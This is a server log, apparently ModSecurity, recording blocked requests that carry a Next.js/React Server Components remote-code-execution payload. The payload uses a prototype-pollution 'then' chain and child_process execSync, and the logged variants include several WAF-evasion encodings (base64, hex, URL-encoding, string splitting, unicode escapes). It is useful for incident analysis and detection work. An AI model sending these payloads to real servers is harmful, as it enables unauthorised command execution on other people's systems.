{\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var\\x5ctres=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw\\x5ctObject.assign(new\\x5ctError('NEXT_REDIRECT'),{digest:\\x5ct`NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/blog"] [unique_id "adJmz7xQSOrq_iRTM7dqVAAAARI"] [Sun Apr 05 15:42:39.433127 2026] [:error] [pid 13019:tid 13254] [client 172.94.9.253:45864] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var/*bypass*/res=process.mainModule.require(/*waf*/'child_process'/*bypass*/).execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_f..."] [sever [hostname "cms.dev-unit.com"] [uri "/contact"] [unique_id "adJmz7xQSOrq_iRTM7dqVgAAAQ4"] [Sun Apr 05 15:42:39.433732 2026] [:error] [pid 13019:tid 13253] [client 172.94.9.253:45880] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var r=process.mainModule.require('child_process').spawnSync('sh',['-c','echo $((41*271))']);var res=r.stdout.toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22..."] [sever [hostname "cms.dev-unit.com"] [uri "/api"] [unique_id "adJmz7xQSOrq_iRTM7dqVwAAAQ0"] [Sun Apr 05 15:42:39.434377 2026] [:error] [pid 13019:tid 13251] [client 172.94.9.253:45850] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/settings"] [unique_id "adJmz7xQSOrq_iRTM7dqWAAAAQs"] [Sun Apr 05 15:42:39.434584 2026] [:error] [pid 13019:tid 13264] [client 172.94.9.253:45878] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync(Buffer.from('ZWNobyAkKCg0MSoyNzEpKQ==','base64').toString()).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/contact"] [unique_id "adJmz7xQSOrq_iRTM7dqWQAAARg"] [Sun Apr 05 15:42:39.434770 2026] [:error] [pid 23077:tid 23107] [client 172.94.9.253:45876] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var/*bypass*/res=process.mainModule.require(/*waf*/'child_process'/*bypass*/).execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_f..."] [sever [hostname "cms.dev-unit.com"] [uri "/blog"] [unique_id "adJmz5c83uMXRUE9zvQTQgAAAdg"] [Sun Apr 05 15:42:39.478649 2026] [:error] [pid 1309:tid 1361] [client 172.94.9.253:45886] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync(Buffer.from('6563686f2024282834312a3237312929','hex').toString()).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/post"] [unique_id "adJmzz-XKUNJEHmNu6G7yAAAAIE"] [Sun Apr 05 15:42:39.478651 2026] [:error] [pid 13019:tid 13244] [client 172.94.9.253:45900] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var r=process.mainModule.require('child_process').spawnSync('sh',['-c','echo $((41*271))']);var res=r.stdout.toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22..."] [sever [hostname "cms.dev-unit.com"] [uri "/blog"] [unique_id "adJmz7xQSOrq_iRTM7dqXAAAAQQ"] [Sun Apr 05 15:42:39.478651 2026] [:error] [pid 13019:tid 13245] [client 172.94.9.253:45888] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync(Buffer.from('6563686f2024282834312a3237312929','hex').toString()).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/contact"] [unique_id "adJmz7xQSOrq_iRTM7dqWwAAAQU"] [Sun Apr 05 15:42:39.478653 2026] [:error] [pid 13019:tid 13242] [client 172.94.9.253:45894] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync(Buffer.from('ZWNobyAkKCg0MSoyNzEpKQ==','base64').toString()).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/post"] [unique_id "adJmz7xQSOrq_iRTM7dqXQAAAQI"] [Sun Apr 05 15:42:39.479332 2026] [:error] [pid 23077:tid 23090] [client 172.94.9.253:45916] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('chi' 'ld_' 'pro' 'cess').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22..."] [sever [hostname "cms.dev-unit.com"] [uri "/contact"] [unique_id "adJmz5c83uMXRUE9zvQTQwAAAcc"] [Sun Apr 05 15:42:39.515938 2026] [:error] [pid 23077:tid 23086] [client 172.94.9.253:45926] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require(['child','_','process'].join('')).execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x..."] [sever [hostname "cms.dev-unit.com"] [uri "/contact"] [unique_id "adJmz5c83uMXRUE9zvQTRAAAAcM"] [Sun Apr 05 15:42:39.516327 2026] [:error] [pid 31198:tid 31266] [client 172.94.9.253:45952] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require(['child','_','process'].join('')).execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x..."] [sever [hostname "cms.dev-unit.com"] [uri "/post"] [unique_id "adJmzzT5TgrBR8xRnfXBBwAAAU4"] [Sun Apr 05 15:42:39.516980 2026] [:error] [pid 13019:tid 13264] [client 172.94.9.253:45968] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22\\x5cu0074\\x5cu0068\\x5cu0065\\x5cu006e\\x22:\\x22$1:__proto__:then\\x22,\\x22\\x5cu0073\\x5cu0074\\x5cu0061\\x5cu0074\\x5cu0075\\x5cu0073\\x22:\\x22resolved_model\\x22,\\x22\\x5cu0072\\x5cu0065\\x5cu0061\\x5cu0073\\x5cu006f\\x5cu006e\\x22:-1,\\x22\\x5cu0076\\x5cu0061\\x5cu006c\\x5cu0075\\x5cu0065\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim(..."] [sever [hostname "cms.dev-unit.com"] [uri "/contact"] [unique_id "adJmz7xQSOrq_iRTM7dqXwAAARg"] [Sun Apr 05 15:42:39.523543 2026] [:error] [pid 13019:tid 13250] [client 172.94.9.253:45918] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22\\x5cu0074\\x5cu0068\\x5cu0065\\x5cu006e\\x22:\\x22$1:__proto__:then\\x22,\\x22\\x5cu0073\\x5cu0074\\x5cu0061\\x5cu0074\\x5cu0075\\x5cu0073\\x22:\\x22resolved_model\\x22,\\x22\\x5cu0072\\x5cu0065\\x5cu0061\\x5cu0073\\x5cu006f\\x5cu006e\\x22:-1,\\x22\\x5cu0076\\x5cu0061\\x5cu006c\\x5cu0075\\x5cu0065\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim(..."] [sever [hostname "cms.dev-unit.com"] [uri "/post"] [unique_id "adJmz7xQSOrq_iRTM7dqYAAAAQo"] [Sun Apr 05 15:42:39.542839 2026] [:error] [pid 13019:tid 13246] [client 172.94.9.253:45938] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('chi' 'ld_' 'pro' 'cess').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22..."] [sever [hostname "cms.dev-unit.com"] [uri "/post"] [unique_id "adJmz7xQSOrq_iRTM7dqYQAAAQY"] [Sun Apr 05 15:42:39.567148 2026] [:error] [pid 1503:tid 1516] [client 172.94.9.253:46000] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync(decodeURIComponent(decodeURIComponent('echo%20%24%28%2841%2A271%29%29'))).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_c..."] [sever [hostname "cms.dev-unit.com"] [uri "/contact"] [unique_id "adJmz0I7AjfUQYCN-J7DxAAAAMc"] [Sun Apr 05 15:42:39.569539 2026] [:error] [pid 13019:tid 13242] [client 172.94.9.253:45998] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22\\x5cu0074\\x5cu0068\\x5cu0065\\x5cu006e\\x22:\\x22$1:\\x5cu005f\\x5cu005f\\x5cu0070\\x5cu0072\\x5cu006f\\x5cu0074\\x5cu006f\\x5cu005f\\x5cu005f:\\x5cu0074\\x5cu0068\\x5cu0065\\x5cu006e\\x22,\\x22\\x5cu0073\\x5cu0074\\x5cu0061\\x5cu0074\\x5cu0075\\x5cu0073\\x22:\\x22\\x5cu0072\\x5cu0065\\x5cu0073\\x5cu006f\\x5cu006c\\x5cu0076\\x5cu0065\\x5cu0064\\x5cu005f\\x5cu006d\\x5cu006f\\x5cu0064\\x5cu0065\\x5cu006c\\x22,\\x22\\x5cu0072\\x5cu0065\\x5cu0061\\x5cu0073\\x5cu006f\\x5cu006e\\x22:-1,\\x22\\x5cu0076\\x5cu0061\\x5cu0..."] [sever [hostname "cms.dev-unit.com"] [uri "/post"] [unique_id "adJmz7xQSOrq_iRTM7dqYwAAAQI"] [Sun Apr 05 15:42:39.570188 2026] [:error] [pid 13019:tid 13245] [client 172.94.9.253:45974] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync(decodeURIComponent(decodeURIComponent('echo%20%24%28%2841%2A271%29%29'))).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_c..."] [sever [hostname "cms.dev-unit.com"] [uri "/post"] [unique_id "adJmz7xQSOrq_iRTM7dqZAAAAQU"] [Sun Apr 05 15:42:39.571756 2026] [:error] [pid 23077:tid 23094] [client 172.94.9.253:45990] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within 